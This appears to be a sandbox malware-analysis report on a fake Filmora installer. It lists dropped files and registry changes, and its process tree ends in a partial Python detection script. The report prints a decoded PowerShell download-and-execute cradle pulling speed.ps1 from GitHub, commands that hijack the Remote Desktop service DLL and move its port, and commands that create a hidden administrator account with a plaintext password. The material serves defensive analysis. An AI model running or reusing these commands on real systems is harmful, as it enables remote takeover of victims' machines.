Analysis
- max time kernel: 150s
- max time network: 153s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 20-07-2021 07:50
Static task: static1
Behavioral task behavioral1: sample Filmora-Wondershare-Installer.exe, resource win7v20210408
Behavioral task behavioral2: sample Filmora-Wondershare-Installer.exe, resource win10v20210410 (the run reported below)
General
- Target: Filmora-Wondershare-Installer.exe
- Size: 9.2MB
- MD5: 5e12e56a643c71b913ea60f48f28726d
- SHA1: 8fd9ef3e15b545335c9cf8a16e7d49bdedc7b6fd
- SHA256: 79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d
- SHA512: 807888068394b8072d607a83b7a181f5018c21c1efd2b8ae433ac59dc28bfbec23e1b13d8b6a2447a3ff8bb9b7ecd71d4d7bff55903a2d23a60b817142c9bae3
Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1 (the URL carried inside the -enc PowerShell one-liner in the process tree; the content of speed.ps1 itself is not part of this report)
Signatures
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
Blocklisted process makes network request 9 IoCs
Processes:
- PID 4380 powershell.exe: network flows 17, 19, 20, 21, 23, 25, 27, 29 and 31
Downloads MZ/PE file
Executes dropped EXE 4 IoCs
Processes:
- PID 3016 ViJoy.exe
- PID 2152 exe2.exe
- PID 3988 exe1.exe
- PID 4200 NFWCHK.exe
Modifies RDP port number used by Windows 1 TTPs
Sets DLL path for service in the registry 2 TTPs
UPX packed file 2 IoCs
Resources (yara rule upx):
- \Windows\Branding\mediasrv.png
- \Windows\Branding\mediasvc.png
Both files carry an image extension but match a PE packer rule; mediasrv.png is the file later registered as the TermService ServiceDLL (see the reg.exe entries in the process tree).
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
- Filmora-Wondershare-Installer.exe: key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation
Deletes itself 1 IoCs
Processes:
- PID 2784 powershell.exe
Loads dropped DLL 2 IoCs
Processes:
- PID 4972 (image name not recorded), 2 events
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
- exe2.exe: file opened for modification \??\PhysicalDrive0
The recorded event is a write-capable handle to the raw disk, which is what this signature keys on; the report does not show any bytes written, so an actual MBR change should be confirmed from a disk image before treating the sample as a bootkit.
Drops file in Program Files directory 4 IoCs
Processes (powershell.exe):
- File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT
- File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI
- File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT
- File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI
Drops file in Windows directory 19 IoCs
Processes (two powershell.exe instances):
- File opened for modification C:\Windows\branding\Basebrd
- File opened for modification C:\Windows\branding\ShellBrd
- File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI43A6.tmp
- File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI43D7.tmp
- File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat
- File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
- File created C:\Windows\branding\mediasrv.png
- File created C:\Windows\branding\mediasvc.png
- File opened for modification C:\Windows\branding\mediasvc.png
- File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_0mtlacfc.v5h.psm1
- File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP
- File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI43E7.tmp
- File created C:\Windows\branding\wupsvc.jpg
- File opened for modification C:\Windows\branding\wupsvc.jpg
- File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI43E8.tmp
- File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
- File opened for modification C:\Windows\branding\mediasrv.png
- File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_rot0kpol.xqw.ps1
- File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI43C6.tmp
The ServiceProfiles\NetworkService paths (SERVIC~2\NETWOR~1 is the same directory in 8.3 form) show that one of these PowerShell instances ran under the NETWORK SERVICE profile. The three files under C:\Windows\branding (mediasrv.png, mediasvc.png, wupsvc.jpg) are the payloads; the rest are PowerShell and INetCache housekeeping.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
(This is the sandbox's generic description of the signature; no IoC is listed for it in this run, and nothing else in the report indicates file encryption.)
Modifies Internet Explorer settings 2 IoCs
Processes:
- exe2.exe: key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch
- exe2.exe: set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"
Modifies data under HKEY_USERS 64 IoCs
Processes: powershell.exe. Every entry is under \REGISTRY\USER\S-1-5-20, the profile hive of NT AUTHORITY\NETWORK SERVICE, so this PowerShell instance was running as that account. The values appear to be the per-user Internet Explorer zone, user-agent and certificate-store initialisation that Windows performs the first time WinINet-based components run under a fresh profile, rather than settings chosen by the script. Paths below are relative to \REGISTRY\USER\S-1-5-20; IS\ stands for Software\Microsoft\Windows\CurrentVersion\Internet Settings\.
- Set value (int) IS\Lockdown_Zones\2\1200 = "3"
- Key created Software\Policies\Microsoft\SystemCertificates\CA
- Set value (int) IS\Lockdown_Zones\3\CurrentLevel = "0"
- Set value (str) IS\Zones\1\Icon = "shell32.dll#0018"
- Set value (str) IS\Lockdown_Zones\1\DisplayName = "Local intranet"
- Set value (int) IS\Zones\2\1200 = "0"
- Set value (int) IS\ZoneMap\ProtocolDefaults\shell = "0"
- Set value (int) IS\ZoneMap\AutoDetect = "0"
- Set value (data) Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000
- Set value (str) Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"
- Set value (str) IS\Lockdown_Zones\3\DisplayName = "Internet"
- Set value (int) IS\Zones\4\1400 = "3"
- Key created Software\Microsoft
- Key created Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map
- Set value (int) IS\ZoneMap\AutoDetect = "1"
- Set value (int) IS\ZoneMap\ProtocolDefaults\http = "3"
- Set value (str) IS\Zones\0\Icon = "shell32.dll#0016"
- Set value (int) IS\Lockdown_Zones\2\1400 = "1"
- Set value (str) IS\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"
- Set value (int) IS\Zones\3\1400 = "0"
- Set value (str) IS\Zones\2\Icon = "inetcpl.cpl#00004480"
- Set value (str) IS\Lockdown_Zones\2\ (default value)
- Key created IS\Lockdown_Zones\0
- Key created Software\Microsoft\SystemCertificates\CA\CTLs
- Key created Software\Classes\Local Settings\MuiCache
- Key created IS\Zones
- Key created Software\Microsoft\SystemCertificates\trust\CTLs
- Set value (int) IS\Zones\4\1200 = "3"
- Set value (int) IS\Lockdown_Zones\4\1200 = "3"
- Key created Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
- Set value (int) IS\Zones\3\1200 = "0"
- Set value (str) IS\Zones\0\ (default value)
- Set value (str) IS\Zones\1\ (default value)
- Set value (str) IS\Lockdown_Zones\0\DisplayName = "My Computer"
- Set value (str) IS\Lockdown_Zones\1\ (default value)
- Set value (int) IS\ZoneMap\UNCAsIntranet = "1"
- Key created Software\Microsoft\SystemCertificates\Disallowed\Certificates
- Set value (data) Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000
- Set value (str) IS\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."
- Set value (str) IS\ZoneMap\Domains\ (default value)
- Key created IS\ZoneMap
- Set value (int) IS\ZoneMap\ProxyBypass = "1"
- Key created Software\Microsoft\SystemCertificates\TrustedPeople\CRLs
- Key created Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0
- Key created Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates
- Key created Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
- Set value (str) Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"
- Set value (str) IS\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"
- Set value (str) IS\Zones\1\LowIcon = "inetcpl.cpl#005423"
- Set value (str) IS\Zones\3\Icon = "inetcpl.cpl#001313"
- Key created Software\Policies\Microsoft\SystemCertificates\Disallowed
- Key created Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
- Set value (str) IS\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480"
- Set value (str) IS\Zones\2\LowIcon = "inetcpl.cpl#005424"
- Key created Software\Microsoft\Windows
- Set value (int) IS\Lockdown_Zones\3\1400 = "1"
- Set value (int) IS\Zones\0\CurrentLevel = "0"
- Key created IS\Zones\3
- Set value (str) IS\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."
- Set value (int) IS\Lockdown_Zones\0\CurrentLevel = "0"
- Key created Software\Microsoft\SystemCertificates\Root
- Key created Software
- Key created Software\Microsoft\Advanced INF Setup\IE40.UserAgent
- Key created Software\Classes\Local Settings\MuiCache\16\52C64B7E
Modifies registry class 1 IoCs
Processes:
- Filmora-Wondershare-Installer.exe: key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance
Modifies registry key 1 TTPs 1 IoCs
Runs net.exe
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
- flows 19, 20, 21 and 23: HTTP User-Agent header "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
These are four of the nine flows attributed to PID 4380 powershell.exe above. The string is the default User-Agent of the WinHttp.WinHttpRequest COM object, so these requests were made through that object rather than through the .NET WebClient used by the -enc one-liner.
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes (event counts):
- PID 2784 powershell.exe: 6
- PID 4316 powershell.exe: 3
- PID 4752 powershell.exe: 3
- PID 5016 powershell.exe: 3
- PID 4380 powershell.exe: 4
- PID 2152 exe2.exe: 2
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
- PID 616 (image name not recorded), 2 events
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes (privileges enabled, in the order recorded):
- PID 2784 powershell.exe: SeDebugPrivilege
- PID 4316 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- PID 4752 powershell.exe: the same 22 privileges in the same order
- PID 5016 powershell.exe: the same sequence up to and including 33 (the list is capped at 64 entries)
Privileges 33 to 36 are shown by LUID; they are SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege and SeDelegateSessionUserImpersonatePrivilege. The three child PowerShell processes enable the full privilege set of their token in one sweep, which is what a script running with an elevated token looks like when it turns everything on rather than the single privilege it needs.
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
- PID 2152 exe2.exe
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
- PID 2152 exe2.exe, 2 events
Suspicious use of WriteProcessMemory 64 IoCs
Processes (parent wrote to the memory of child; every pair was recorded two or three times, duplicates collapsed here):
- 1868 Filmora-Wondershare-Installer.exe -> 3016 ViJoy.exe
- 3016 ViJoy.exe -> 3988 exe1.exe
- 3016 ViJoy.exe -> 2152 exe2.exe
- 3988 exe1.exe -> 2784 powershell.exe
- 2784 powershell.exe -> 4116 csc.exe
- 4116 csc.exe -> 4156 cvtres.exe
- 2152 exe2.exe -> 4200 NFWCHK.exe
- 2784 powershell.exe -> 4316, 4752 and 5016 powershell.exe
- 2784 powershell.exe -> 4240, 4224 and 1028 reg.exe
- 2784 powershell.exe -> 4728 net.exe -> 4340 net1.exe
- 2784 powershell.exe -> 4768 cmd.exe -> 4812 cmd.exe -> 4856 net.exe -> 2760 net1.exe
- 2784 powershell.exe -> 4904 cmd.exe -> 4920 cmd.exe -> 4936 net.exe -> 4956 net1.exe
- 4756 cmd.exe -> 5000 net.exe -> 5012 net1.exe
- 4772 cmd.exe -> 3176 net.exe -> 4164 net1.exe
- 4160 cmd.exe -> 4196 net.exe -> 3708 net1.exe
- 3496 cmd.exe -> 4112 net.exe -> 4152 net1.exe
Every pair is a parent writing into a child it has just created, the normal pattern a hooking sandbox records for process creation. Read this list as a process-lineage record with PIDs, not as evidence of injection into an unrelated process.
Processes
Indentation follows the parent/child depth the sandbox recorded. Each entry shows the image path, the full command line, and the signatures attributed to that process. The cmd.exe entries that start at depth 1 after the first tree are separate roots whose parent was not captured; the registry and file activity of the PowerShell at the end of them is consistent with it running as NT AUTHORITY\NETWORK SERVICE (see "Modifies data under HKEY_USERS" above).

C:\Users\Admin\AppData\Local\Temp\Filmora-Wondershare-Installer.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\Filmora-Wondershare-Installer.exe"
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Local\Temp\ViJoy.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
      command line: "C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"
      - Executes dropped EXE
      - Writes to the Master Boot Record (MBR)
      - Modifies Internet Explorer settings
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      C:\Users\Public\Documents\Wondershare\NFWCHK.exe
        command line: C:\Users\Public\Documents\Wondershare\NFWCHK.exe
        - Executes dropped EXE
    C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
      command line: "C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
        - Deletes itself
        - Drops file in Windows directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f0xtmrhz\f0xtmrhz.cmdline"
          (the compile pattern Windows PowerShell's Add-Type produces; the output is the f0xtmrhz.dll listed under Downloads)
          - Suspicious use of WriteProcessMemory
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCC7.tmp" "c:\Users\Admin\AppData\Local\Temp\f0xtmrhz\CSCE599C57EBA6F41B09372974D9DECE673.TMP"
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          (-s is PowerShell's server mode; this is the command line Start-Job uses for its background runspace process, so ready.ps1 started three background jobs)
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        C:\Windows\system32\reg.exe
          command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          (moves the RDP listener from 3389 to 7201)
        C:\Windows\system32\reg.exe
          command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
          (replaces %SystemRoot%\System32\termsrv.dll with the dropped UPX-packed DLL; svchost will load it the next time the Remote Desktop service starts)
          - Modifies registry key
        C:\Windows\system32\reg.exe
          command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
          (policy "Use WDDM graphics display driver for Remote Desktop Connections" set to disabled)
        C:\Windows\system32\net.exe
          command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
          (the account the TermService svchost, and therefore the replacement ServiceDLL, runs as)
          - Suspicious use of WriteProcessMemory
          C:\Windows\system32\net1.exe
            command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        C:\Windows\system32\cmd.exe
          command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
          - Suspicious use of WriteProcessMemory
          C:\Windows\system32\cmd.exe
            command line: cmd /c net start rdpdr
            - Suspicious use of WriteProcessMemory
            C:\Windows\system32\net.exe
              command line: net start rdpdr
              - Suspicious use of WriteProcessMemory
              C:\Windows\system32\net1.exe
                command line: C:\Windows\system32\net1 start rdpdr
        C:\Windows\system32\cmd.exe
          command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
          - Suspicious use of WriteProcessMemory
          C:\Windows\system32\cmd.exe
            command line: cmd /c net start TermService
            - Suspicious use of WriteProcessMemory
            C:\Windows\system32\net.exe
              command line: net start TermService
              - Suspicious use of WriteProcessMemory
              C:\Windows\system32\net1.exe
                command line: C:\Windows\system32\net1 start TermService
        C:\Windows\system32\cmd.exe
          command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
        C:\Windows\system32\cmd.exe
          command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

C:\Windows\System32\cmd.exe
  command line: cmd /C net.exe user WgaUtilAcc 000000 /del
  (removes any existing account of that name before recreating it below)
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\net.exe
    command line: net.exe user WgaUtilAcc 000000 /del
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe
      command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe
  command line: cmd /C net.exe user WgaUtilAcc leaP4oKy /add
  (local account WgaUtilAcc created with the password leaP4oKy in clear on the command line)
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\net.exe
    command line: net.exe user WgaUtilAcc leaP4oKy /add
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe
      command line: C:\Windows\system32\net1 user WgaUtilAcc leaP4oKy /add

C:\Windows\System32\cmd.exe
  command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\net.exe
    command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe
      command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe
  command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
  (no creation of an account named RJMQBVDN$ appears anywhere in the report)
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\net.exe
    command line: net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe
      command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD

C:\Windows\System32\cmd.exe
  command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  C:\Windows\system32\net.exe
    command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    C:\Windows\system32\net1.exe
      command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe
  command line: cmd /C net.exe user WgaUtilAcc leaP4oKy
  (sets the password again, which also covers the case where the account already existed)
  C:\Windows\system32\net.exe
    command line: net.exe user WgaUtilAcc leaP4oKy
    C:\Windows\system32\net1.exe
      command line: C:\Windows\system32\net1 user WgaUtilAcc leaP4oKy

C:\Windows\System32\cmd.exe
  command line: cmd.exe /C wmic path win32_VideoController get name
  C:\Windows\System32\Wbem\WMIC.exe
    command line: wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe
  command line: cmd.exe /C wmic CPU get NAME
  C:\Windows\System32\Wbem\WMIC.exe
    command line: wmic CPU get NAME

C:\Windows\System32\cmd.exe
  command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  (the blob is base64 of UTF-16LE and decodes to: IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1"), the URL given under Malware Config)
  C:\Windows\system32\cmd.exe
    command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      - Blocklisted process makes network request
      - Drops file in Program Files directory
      - Drops file in Windows directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
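The chain the Signatures section and the process tree describe (RDP listener moved off 3389, TermService ServiceDLL repointed at a dropped file, a local account created and placed in Administrators and Remote Desktop Users, the loader fetched through an -enc PowerShell one-liner) is easy to lose in raw process-creation telemetry. The script below is an added example, not code from this report, from the sample, or from Wondershare: it decodes the -EncodedCommand blob (base64 of UTF-16LE, which PowerShell accepts unpadded) and tags the command lines that make up the chain. The command lines it scans are copied from the process tree above and assembled into a constructed list in the shape a Sysmon event 1 feed would deliver them; the function and tag names are my own.

```python
import base64
import re

# The -enc blob exactly as it appears in the process tree of this report.
ENC_BLOB = "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA"

# Command lines copied from the process tree; the list itself is a constructed feed.
REPORT_COMMAND_LINES = [
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f',
    r'"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f',
    r'"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f',
    r'"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add',
    r'net.exe user WgaUtilAcc leaP4oKy /add',
    r'net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD',
    r'net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD',
    r'"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f',
    "powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc " + ENC_BLOB,
]

# PowerShell accepts -e, -ec, -enc and -EncodedCommand in any case; the blob may be unpadded.
ENC_RE = re.compile(r"(?:^|\s)[-/]e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>)]+")
RDP_PORT_RE = re.compile(r"RDP-Tcp.*?/v\s+PortNumber\b.*?/d\s+(\S+)", re.I)
TERMSRV_DLL_RE = re.compile(
    r"services\\TermService\\parameters.*?/v\s+ServiceDLL\b.*?/d\s+(\"[^\"]+\"|\S+)", re.I)
NET_USER_ADD_RE = re.compile(r"\bnet(?:1|\.exe)?\"?\s+user\s+\S+(?:\s+\S+)?\s+/add\b", re.I)
NET_GROUP_ADD_RE = re.compile(
    r"\bnet(?:1|\.exe)?\"?\s+localgroup\s+(\"[^\"]+\"|\S+)\s+.+?/add\b", re.I)


def decode_encoded_command(cmdline):
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    try:
        return base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def rdp_port_from_cmdline(cmdline):
    """Port written by 'reg add ... RDP-Tcp /v PortNumber /d <n>', or None.
    reg.exe takes decimal or 0x-prefixed hex for REG_DWORD; int(x, 0) handles both."""
    m = RDP_PORT_RE.search(cmdline)
    try:
        return int(m.group(1), 0) if m else None
    except ValueError:
        return None


def termservice_dll_from_cmdline(cmdline):
    """Value written to TermService\\parameters\\ServiceDLL, or None."""
    m = TERMSRV_DLL_RE.search(cmdline)
    return m.group(1).strip('"') if m else None


def classify(cmdline):
    """Tags for the steps of the chain this report shows; empty list if none match."""
    tags = []
    if rdp_port_from_cmdline(cmdline) is not None:
        tags.append("rdp_port_change")
    dll = termservice_dll_from_cmdline(cmdline)
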